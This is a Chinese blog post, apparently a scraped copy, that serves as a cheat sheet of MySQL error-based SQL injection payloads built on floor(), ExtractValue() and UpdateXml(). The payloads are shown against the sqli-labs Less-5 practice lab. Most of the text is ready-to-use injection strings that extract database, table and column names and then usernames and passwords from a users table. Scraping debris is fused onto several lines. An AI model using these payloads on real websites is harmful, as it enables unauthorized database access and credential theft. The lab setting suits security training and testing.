SQL报错常见的注入姿式

时间 2020-05-08

标签 sql 报错常见的注入栏目 SQL 繁體版

原文原文链接

写在前面

　　又是填坑的一篇姿式总结文，先介绍floor()、ExtractValue()、UpdateXml()，剩下的报错我目前还没遇到过（多是太菜）能够用sqli-libs Less5来演示html

　　姿式汇总 https://www.cnblogs.com/wocalieshenmegui/p/5917967.htmlsql

floor()

　ExtractValue函数

UpdateXmlui

SQL报错注入

　　通常的在页面有报错信息但没显位的时候有报错时候使用，它的特色是注入速度快，可是语句较复杂,不能用group_concat(),只能用limit依次猜解，spa

　　这种前三步和正常的同样，但当页面无回显注入数据只显示SQL报错信息时候就能够尝试利用.net

floor()

　　公式code

#库名
AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+

#表名
AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(group_concat(table_name)AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=‘security’ LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+

# 列名
AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(group_concat(column_name)AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_name = 'users' and table_schema = 'security' LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+ 

#数据
#（这个构造数据只能一个一个爆出来，经过limit函数控制）
AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(password) AS CHAR),0x7e)) FROM security.users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+（这个构造数据只能一个一个爆出来，经过limit函数控制）

ExtractValue

　　公式orm

#库名
' and extractvalue(1, concat(0x5c, 1' and extractvalue(1, concat(0x5c,database()));--+

#表名
' and extractvalue(1,concat(0x7e,(select group_concat( table_name) from information_schema.tables where table_schema='security'),0x7e)) --+

#列名

' and extractvalue(1,concat(0x7e,(select group_concat( column_name) from information_schema.columns where table_name='users'),0x7e)) --+

#字段值

' and extractvalue(1,concat(0x7e,(select group_concat(id,username,password) from security.users ),0x7e)) --+

UpdateXml

公式xml

#库名
' and 1=(updatexml(1,concat(0x3a,(select database())),1)) --+

#表名

' and 1=(updatexml(1,concat(0x3a,(select group_concat( table_name) from information_schema.tables where table_schema='security')),1)) --+

#字段名

' and 1=(updatexml(1,concat(0x3a,(select group_concat( column_name) from information_schema.columns where table_name='users')),1)) --+

#字段值

' and 1=(updatexml(1,concat(0x3a,(select group_concat(id,username,password) from security.users )),1)) --+

　　常见的就这3种，其余的我目前没见过（可能太菜），后续碰见会再更新htm

参考连接

https://blog.csdn.net/bangyan3903/article/details/101788019

https://blog.csdn.net/weixin_30852451/article/details/98668307

1. 【SQL注入】报错注入
2. SQL注入---报错注入
3. SQL报错注入
4. SQL注入--盲注及报错注入
5. SQL注入姿势
6. 常见的注入方式
7. sql注入--双查询报错注入
8. SQL注入:floor()报错注入
9. sql注入——sqlserver报错注入
10. SQL报错型注入
更多相关文章...
• Spring DI（依赖注入）的实现方式：属性注入和构造注入 - Spring教程
• SQLite 注入 - SQLite教程
• 常用的分布式事务解决方案
• YAML 入门教程